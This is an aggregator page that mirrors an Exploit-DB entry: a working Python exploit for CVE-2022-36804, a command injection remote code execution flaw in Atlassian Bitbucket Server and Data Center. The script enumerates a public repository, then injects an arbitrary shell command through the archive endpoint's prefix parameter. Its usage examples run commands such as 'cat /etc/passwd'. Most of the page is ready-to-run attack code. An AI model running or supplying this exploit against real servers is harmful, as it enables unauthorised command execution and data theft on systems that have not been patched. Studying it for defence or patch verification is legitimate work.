1

[webapps] Bitbucket v7.0.0 - RCE

 1 year ago
source link: https://www.exploit-db.com/exploits/51040
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.

Bitbucket v7.0.0 - RCE

EDB-ID:

51040

EDB Verified:

Exploit:

  /  

Platform:

Python

Date:

2023-03-23

Vulnerable App:

# Exploit Title: Bitbucket v7.0.0 -  RCE
# Date: 09-23-2022
# Exploit Author: khal4n1
# Vendor Homepage: https://github.com/khal4n1
# Tested on: Kali and ubuntu LTS 22.04
# CVE : cve-2022-36804

#****************************************************************#
#The following exploit is used to exploit a vulnerability present
#Atlassian Bitbucket Server and Data Center 7.0.0 before version
#7.6.17, from version 7.7.0 before version 7.17.10, from version
#7.18.0 before version 7.21.4, from version 8.0.0 before version
#8.0.3, from version 8.1.0 before version 8.1.3, and from version
#8.2.0 before version 8.2.2, and from version 8.3.0 before 8.3.1

#Usage Example

# python3 mexploit.py --url http://127.0.0.1:7990 --cmd 'cat /etc/passwd'

# python3 mexploit.py --url http://127.0.0.1:7990 --cmd 'id'

#The server will send a 500 http response with the stout output from the
# command  executed.


#****************************************************************#

#!/usr/bin/python3

import argparse
import urllib
from urllib import request
import re

#argument setup
parser = argparse.ArgumentParser(description='Program to test
bitbucket vulnerability CVE-2022-36804')
parser.add_argument("--url", help="Set the target to attack.
[REQUIRED]", required=True )
parser.add_argument("--cmd", help="Set the command to execute.
[DEFAULT ID]", required=True, default='id')
args = parser.parse_args()
cmd= urllib.parse.quote(args.cmd)


#reads from the public repository what is available
requ = request.urlopen(args.url+ "/repos?visibility=public")
response = requ.read()

#select a public project and stores it in a variable
project = re.findall('7990/projects/(.*)/repos/',
str(re.findall('7990/projects/(.*)/repos/', str(response))[-1]))[-1]

#Selects a public repo and stores it in a vatiable
file = re.findall('/repos/(.*)/browse',
str(re.findall('7990/projects/(.*)/repos/', str(response))[-1]))[0]

# Exploitation
try :
        attack = request.urlopen(args.url +
"/rest/api/latest/projects/" + project + "/repos/" + file +
"/archive?prefix=ax%00--exec=%60"+cmd+"%60%00--remote=origin")
        print (attack.response())
except urllib.error.HTTPError as e:
        body = e.read().decode()  # Read the body of the error response
        print (body)

report

Recommend

About Joyk


Aggregate valuable and interesting links.
Joyk means Joy of geeK